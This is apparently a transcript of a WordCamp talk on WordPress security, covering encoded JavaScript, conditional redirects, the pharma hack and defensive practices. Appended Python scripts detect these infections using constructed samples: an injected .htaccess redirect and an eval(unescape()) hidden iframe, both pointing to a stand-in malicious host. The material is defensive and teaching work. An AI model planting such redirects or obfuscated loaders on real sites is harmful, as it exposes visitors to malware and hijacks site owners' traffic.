Why My Website Sells Viagra

WordPress End-User Security - WordCamp Atlanta - Dre Armeda, CISSP

Published in: Technology
  • Very good! Congratulations!
  • Hello
  • This is good. Raising the bar from a programmer pov. I like it.

Why My Website Sells Viagra

  1. 2. DRE ARMEDA, CISSP @DREMEDA
       • CO-FOUNDER AT SUCURI SECURITY
       • ORGANIZER, WORDCAMP SAN DIEGO
       • 12 YEAR NAVY VETERAN
       • 1ST WORDPRESS THEME IN 2005
       • LOVES TACOS
       • DIEHARD CHARGERS FAN
       • RIDES A HARLEY
       SUCURI.NET DRE.IM
  3. 4. THE WEB IS GROWING
       • Over 2 billion internet users today. 480% growth in the last 11 years. (Internet World Stats)
       • 300 million websites were added to the internet in 2011 (Pingdom)
       • 100,000+ domains gained weekly (Global Domain Registry)
  4. 5. INNOVATION & CREATIVITY
  9. 10. IT’S NOT ALL PEACHY
  11. 12. WHAT IS MALWARE?
       Malware, short for malicious software, is software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.
       • SEO spam, JavaScript & iFrame attacks, and malicious redirects are a few examples of web-based malware.
  12. 14. ATTACKERS LOVE YOU
       • Monitor your web browsing and internet usage
       • Forced advertising
       • Redirect affiliate marketing revenue
  13. 15. HOW BAD IS IT?
       • Over 2 million new malware strings monthly (McAfee)
       • Cost to US consumers alone = over $2.3 billion in 2010. (Consumer Reports)
       • Google Safe Browsing issues over 3 million malware warnings a day. (Google)
  15. 17. ENCODED JAVASCRIPT
       JavaScript that is obfuscated (hidden) so that you can’t tell what it is. It is injected into files/pages on the site and used to serve malware.
       Impact: Website pages may be used to serve malicious downloads to visitors. Downloads may be used to infect desktop computers and/or exploit FTP info.
       Typical Entry Point: Outdated, known vulnerable software; exploited desktop computers; exploited FTP credentials.
  16. 18. ENCODED JAVASCRIPT /wp-admin/js/cat.js – CLEAN
  17. 19. ENCODED JAVASCRIPT /wp-admin/js/cat.js – INFECTED
  18. 20. ENCODED JAVASCRIPT /wp-admin/js/cat.js – INFECTION DECODED – Somewhat
  19. 21. ENCODED JAVASCRIPT
       How it works:
       • Attacker scans for known vulnerable software (old WordPress installations, plugins, themes). Alternatively, the attack stems from an exploited desktop, where FTP information is stolen.
       • Backdoor file inserted into the environment. This gives the attacker remote access into your world.
       • Payload inserted into various JavaScript files and/or encoded and hidden in theme and plugin files.
       • You’ve just enabled your visitors to load fake anti-virus and other cool downloads from your site.
  20. 22. ENCODED JAVASCRIPT
       Encoded JavaScript Resources:
       • http://www.schillmania.com/content/entries/2009/javascript-malware-obfuscation-analysis
       • http://www.slideshare.net/yusufmotiwala/reverse-engineering-malicious-javascript
       • http://www.infosecisland.com/videos-view/19101-Malware-Analysis-How-to-Decode-JavaScript-Obfuscation.html
       QUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra
  21. 23. CONDITIONAL REDIRECTS
       An attack that causes a website to redirect to a malicious website based on referrer, web browser, or operating system.
       Impact: When traffic comes from a specific referrer (e.g. Google, Bing), the site redirects to a malicious website.
       Typical Entry Point: Outdated, known vulnerable software.
  22. 24. CONDITIONAL REDIRECTS Infected .htaccess file:
  23. 25. CONDITIONAL REDIRECTS Result of conditional redirect:
  24. 26. CONDITIONAL REDIRECTS
       How it works:
       • Attacker scans for known vulnerable software (old WordPress installations, plugins, themes).
       • Backdoor file inserted into the environment. This gives the attacker remote access into your world.
       • .htaccess file entries are created to perform the redirect. Encoded redirect code can also be added to index files.
       • You’re now redirecting to some cool malware awesomeness.
  25. 27. CONDITIONAL REDIRECTS
       Conditional Redirects Resources:
       • http://blog.sucuri.net/2011/11/the-new-and-old-htaccess-attacks-now-using-in-domains.html
       • http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
       • http://sucuri.net/malware-update-timthumb-php-and-htaccess-redirection.html
  26. 28. PHARMA HACK
       Pharma Hack is a type of SEO poisoning. Attackers manipulate search engine results to make their links appear higher than legitimate results.
       Impact: Website page and post titles, descriptions and links are changed to display pharmaceutical ads and links back to malicious websites on search engine result pages.
       Typical Entry Point: Outdated, known vulnerable software.
  27. 29. PHARMA HACK Results of scanning rendered source:
  28. 30. PHARMA HACK Google Search Engine Results:
  29. 31. PHARMA HACK
       How it works:
       • Attacker scans for known vulnerable software (old WordPress installations, plugins, themes).
       • Backdoor file inserted into the environment. This gives the attacker remote access into your world.
       • Control file is inserted into core application or plugin files. This file acts as a connection from the backdoor to the database.
       • Payload is dropped into the database and Viva Viagra!
       QUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra
  30. 32. PHARMA HACK
       Pharma Hack Resources:
       • http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html
       • http://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
       • http://www.pearsonified.com/2010/04/wordpress-pharma-hack.php
       • http://wpdude.com/refreshing-google-index-after-pharma-hack
       QUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra
  32. 34. WHAT IS SECURITY? PROTECTING THINGS OF VALUE FROM HARM’S WAY.
  33. 35. HOW & WHY
  34. 36. AM I SECURE The percentage of risk can never be 0! The name of the game is minimizing risk.
  35. 38. LOCAL MACHINE
       • Ensure your local machine stays updated
       • Use an Anti-Virus solution & enable auto-updates
           • Mac – Sophos Anti-Virus for Mac Home Edition
           • Windows – AVG Anti-Virus Free
       • Don’t store server credentials on your local machine
  36. 39. CONNECT TO YOUR SITE
       • Consider using sFTP or SSH instead of FTP.
       • If you’re stuck with FTP:
           • Deny anonymous login
           • Limit connections
       • Practice least privilege
       • Don’t store server credentials on your local machine
  37. 40. PASSWORDS
       • Change them often
       • Don’t write them down, or share them
       • Passwords are like toothbrushes: you should keep them to yourself, and discard them and get a new one if they have been used by others.
       • Don’t use the same password across all your accounts
       • Use a password manager
           • KeePass Password Safe
           • LastPass
           • 1Password
  38. 41. WHO HOSTS YOU?
       • CHEAP DOES NOT ALWAYS MEAN BEST, OR SAFEST!
       • DO YOUR RESEARCH!
       • What software are they running? How often do they update?
       • How are server and support credentials stored & who has access? Are they one and the same?
       • What is their malware remediation process?
       • How many sites have been infected?
       • http://www.google.com/safebrowsing/diagnostic?site=google.com
  39. 42. GARAGE CLEANING
       • IF YOU’RE NOT USING IT, REMOVE IT!
       • UPDATE UPDATE UPDATE UPDATE UPDATE
       • Only load what’s needed to get your job done.
       • Check your file and directory permissions.
       • Remove user accounts! – Practice least privilege.
       • Have you changed your password lately?
       • UPDATE UPDATE UPDATE UPDATE UPDATE
  41. 44. BACKUP YOUR WEBSITE
       • NO BACKUPS = BOOOOO!
       • BackupBuddy – http://pluginbuddy.com/backupbuddy/
       • VaultPress – http://vaultpress.com
  42. 45. MALWARE SCAN
       • IS YOUR SITE INFECTED?
       • Unmask Parasites – http://unmaskparasites.com
       • Sucuri SiteCheck – http://sitecheck.sucuri.net
  43. 46. MALWARE CLEAN UP
       • IS YOUR SITE INFECTED?
       • VaultPress – http://vaultpress.com
       • Sucuri Security – http://sucuri.net
  44. 47. WORDPRESS PLUGINS
       • WordPress Exploit Scanner
       • BulletProof Security
       • Login Lockdown
       • Sucuri SiteCheck Malware Scanner
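
Slides 23 to 27 describe redirects that fire only for a given referrer, browser or operating system and are planted in .htaccess. A local check for that pattern follows as an added example (not code from the deck or from Sucuri); the sample file, the `malicious.example` host and the function name are constructed for illustration.

```python
from urllib.parse import urlparse

# Triggers named on the slides: referrer, browser, operating system
# (browser and OS are both read from the User-Agent header).
TRIGGERS = ("%{HTTP_REFERER}", "%{HTTP_USER_AGENT}")

def find_conditional_redirects(htaccess_text, own_hosts):
    """Return (line_no, trigger_vars, target) for every RewriteRule that sends
    visitors to a host outside own_hosts only when a referrer/UA test matches."""
    findings, conds = [], []
    for line_no, raw in enumerate(htaccess_text.splitlines(), 1):
        parts = raw.split()          # split() also ignores indentation around a rule
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            conds.append(parts[1].upper())
        elif directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            host = (urlparse(target).hostname or "").lower()
            hit = sorted({c for c in conds if c in TRIGGERS})
            if hit and host and host not in own_hosts:
                findings.append((line_no, hit, target))
            conds = []               # RewriteCond lines apply only to the next rule
    return findings

# Constructed sample: the stock WordPress block followed by an injected rule set.
SAMPLE_HTACCESS = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
        RewriteEngine On
        RewriteCond %{HTTP_REFERER} .*(google|bing|yahoo).* [NC,OR]
        RewriteCond %{HTTP_USER_AGENT} .*(windows).* [NC]
        RewriteRule ^(.*)$ http://malicious.example/in.php?q=$1 [R=301,L]
"""

if __name__ == "__main__":
    for finding in find_conditional_redirects(SAMPLE_HTACCESS, {"example.com", "www.example.com"}):
        print(finding)
```

Pass every hostname the site legitimately redirects to in `own_hosts`; anything reported is a line to compare against a known-good copy of the file.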
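
For the encoded JavaScript of slides 17 to 22, a static check that flags decode-and-run wrappers and decodes percent-encoded and `String.fromCharCode` runs without executing anything. This is an added example, not the deck's code; the script contents and the `malicious.example` URL are constructed, and a match is a heuristic lead to compare against a clean copy of the file, since legitimately packed scripts can also trigger it.

```python
import re
from urllib.parse import unquote

# A decoder call nested directly inside eval() or document.write().
WRAPPERS = re.compile(
    r"\b(?:eval|document\.write)\s*\(\s*"
    r"(?:unescape|decodeURIComponent|atob|String\.fromCharCode)\s*\(")
# Eight or more consecutive %XX escapes.
PERCENT_RUN = re.compile(r"(?:%[0-9a-fA-F]{2}){8,}")
# String.fromCharCode(...) with eight or more numeric arguments.
CHARCODE_CALL = re.compile(
    r"String\.fromCharCode\s*\(\s*(\d{1,3}(?:\s*,\s*\d{1,3}){7,})\s*\)")

def scan_js(source):
    """Flag decode-and-run wrappers and return the statically decoded runs.
    The script is only read as text; nothing in it is executed."""
    decoded = [unquote(m.group(0)) for m in PERCENT_RUN.finditer(source)]
    for m in CHARCODE_CALL.finditer(source):
        decoded.append("".join(chr(int(code)) for code in m.group(1).split(",")))
    return {"wrapped": bool(WRAPPERS.search(source)), "decoded": decoded}

# Constructed sample data (not the real contents of /wp-admin/js/cat.js).
HIDDEN = ('document.write("<iframe src=http://malicious.example/ '
          'width=1 height=1></iframe>")')
CLEAN_JS = "jQuery(document).ready(function($){ $('#cat-list').show(); });\n"
INFECTED_JS = (CLEAN_JS + "eval(unescape('"
               + "".join("%%%02x" % ord(c) for c in HIDDEN) + "'));\n")

if __name__ == "__main__":
    for name, text in (("clean", CLEAN_JS), ("infected", INFECTED_JS)):
        print(name, scan_js(text))
```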
